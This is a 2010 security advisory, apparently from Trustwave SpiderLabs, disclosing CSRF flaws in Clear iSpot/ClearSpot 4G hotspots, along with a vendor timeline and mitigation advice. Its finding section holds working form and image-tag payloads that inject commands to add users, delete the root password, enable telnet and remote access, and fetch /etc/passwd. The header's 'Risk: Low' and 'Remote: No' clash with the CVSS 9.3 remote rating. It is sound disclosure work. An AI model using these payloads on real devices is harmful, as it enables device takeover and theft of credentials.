Clear iSpot/Clearspot CSRF Vulnerabilities

2010-12-20 / 2010-12-21
Risk: Low
Local: No
Remote: No
CWE: CWE-352


CVSS Base Score: 9.3/10
Impact Subscore: 10/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: No required
Confidentiality impact: Complete
Integrity impact: Complete
Availability impact: Complete

Trustwave's SpiderLabs Security Advisory TWSL2010-008: Clear iSpot/Clearspot CSRF Vulnerabilities https://www.trustwave.com/spiderlabs/advisories/TWSL2010-008.txt Published: 2010-12-10 Version: 1.0 Vendor: Clear (http://www.clear.com <http://www.clear.com/>) Products: iSpot / ClearSpot 4G (http://www.clear.com/devices) Versions affected: The observed behavior the result of a design choice, and may be present on multiple versions. The specific versions used during testing are given below. iSpot version: 2.0.0.0 [R1679 (Jul 6 2010 17:57:37)] Clearspot versions: 2.0.0.0 [R1512 (May 31 2010 18:57:09)] 2.0.0.0 [R1786 (Aug 4 2010 20:09:06)] Firmware Version : 1.9.9.4 Hardware Version : R051.2 Device Name : IMW-C615W Device Manufacturer : INFOMARK (http://infomark.co.kr <http://infomark.co.kr/>) Product Description: iSpot and ClearSpot 4G are portable 4G devices, that allow users to share and broadcast their own personal WiFi network. The device connects up to 8 clients at the same time, on the same 4G connection. Credit: Matthew Jakubowski of Trustwave's SpiderLabs CVE: CVE-2010-4507 Finding: These devices are susceptible to Cross-Site Request Forgery (CSRF). An attacker that is able to coerce a ClearSpot / iSpot user into following a link can arbitrarily execute system commands on the device. The following examples will allow an attacker to enable remote access to the iSpot and ClearSpot 4G, and add their own account to the device. This level of access also provides a device's client-side SSL certificates, which are used to perform device authentication. This could lead to a compromise of ClearWire accounts as well as other personal information. Add new user: <form method="post" action="http://server/cgi-bin/webmain.cgi"; <http://192.168.1.1/cgi-bin/webmain.cgi%22>> <input type="hidden" name="act" value="act_cmd_result"> <input type="hidden" name="cmd" value="adduser -S jaku"> <input type="submit"> </form> or <img src='http://server/cgi-bin/webmain.cgi?act=act_cmd_result&cmd=adduser% 20-S%20jaku'> Remove root password: <form method="post" action="http://server/cgi-bin/webmain.cgi"; <http://192.168.1.1/cgi-bin/webmain.cgi%22>> <input type="hidden" name="act" value="act_cmd_result"> <input type="hidden" name="cmd" value="passwd -d root"> <input type="submit"> </form> or <img src='http://server/cgi-bin/webmain.cgi?act=act_cmd_result&cmd=passwd%2 0-d%20root'> Enable remote administration access: <form method="post" action="http://server/cgi-bin/webmain.cgi"; <http://server/cgi-bin/webmain.cgi%22>> <input type="hidden" name="act" value="act_network_set"> <input type="hidden" name="enable_remote_access" value="YES"> <input type="hidden" name="remote_access_port" value="80"> <input type="submit"> </form> or <img src='http://server/cgi-bin/webmain.cgi?act=act_network_set&enable_remo te_access=YES&remote_access_port=80'> Enable telnet if not already enabled: <form method="post" action="http://server/cgi-bin/webmain.cgi"; <http://server/cgi-bin/webmain.cgi%22>> <input type="hidden" name="act" value="act_set_wimax_etc_config"> <input type="hidden" name="ENABLE_TELNET" value="YES"> <input type="submit"> </form> or <img src='http://server/cgi-bin/webmain.cgi?act=act_set_wimax_etc_config&EN ABLE_TELNET=YES'> Allow remote telnet access: <form method="post" action="http://server/cgi-bin/webmain.cgi"; <http://server/cgi-bin/webmain.cgi%22>> <input type="hidden" name="act" value="act_network_set"> <input type="hidden" name="add_enable" value="YES"> <input type="hidden" name="add_host_ip" value="1"> <input type="hidden" name="add_port" value="23"> <input type="hidden" name="add_protocol" value="BOTH"> <input type="hidden" name="add_memo" value="admintelnet"> <input type="submit"> </form> or <img src='http://server/cgi-bin/webmain.cgi?act=act_network_set&add_enable= YES&add_host_ip=1&add_port=23&add_protocol=both&add_memo=admintelnet'> Once compromised, it is possible to download any file from the devices using the following method. Download /etc/passwd file: <form method="post" action="http://server/cgi-bin/upgrademain.cgi <http://server/cgi-bin/upgrademain.cgi> "> <input type="hidden" name="act" value="act_file_download"> <input type="hidden" name="METHOD" value="PATH"> <input type="hidden" name="FILE_PATH" value="/etc/passwd"> <input type="submit"> </form> or <img src='http://server/cgi-bin/upgrademain.cgi?act=act_file_download&METHO D=PATH&FILE_PATH=/etc/passwd'> Vendor Response: No official response is available at the time of release. Remediation Steps: No patch currently exists for this issue. To limit exposure, network access to these devices should be limited to authorized personnel through the use of Access Control Lists and proper network segmentation. Vendor Communication Timeline: 8/26/10 - Vendor contact initiated. 9/30/10 - Vulnerability details provided to vendor. 12/3/10 - Notified vendor of release date. No workaround or patch provided. 12/10/10 - Advisory published. Revision History: 1.0 Initial publication About Trustwave: Trustwave is the leading provider of on-demand and subscription-based information security and payment card industry compliance management solutions to businesses and government entities throughout the world. For organizations faced with today's challenging data security and compliance environment, Trustwave provides a unique approach with comprehensive solutions that include its flagship TrustKeeper compliance management software and other proprietary security solutions. Trustwave has helped thousands of organizations--ranging from Fortune 500 businesses and large financial institutions to small and medium-sized retailers--manage compliance and secure their network infrastructure, data communications and critical information assets. Trustwave is headquartered in Chicago with offices throughout North America, South America, Europe, Africa, China and Australia. For more information, visit https://www.trustwave.com <https://www.trustwave.com/> About Trustwave's SpiderLabs: SpiderLabs is the advance security team at Trustwave responsible for incident response and forensics, ethical hacking and application security tests for Trustwave's clients. SpiderLabs has responded to hundreds of security incidents, performed thousands of ethical hacking exercises and tested the security of hundreds of business applications for Fortune 500 organizations. For more information visit https://www.trustwave.com/spiderlabs Disclaimer: The information provided in this advisory is provided "as is" without warranty of any kind. Trustwave disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. 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